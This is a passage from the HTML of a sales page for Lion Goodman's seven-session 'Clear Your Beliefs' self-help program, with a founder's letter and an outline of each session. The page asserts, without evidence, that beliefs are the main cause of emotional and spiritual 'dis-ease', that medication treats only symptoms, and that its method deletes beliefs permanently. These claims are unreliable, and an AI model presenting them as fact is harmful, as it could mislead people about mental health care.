goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the 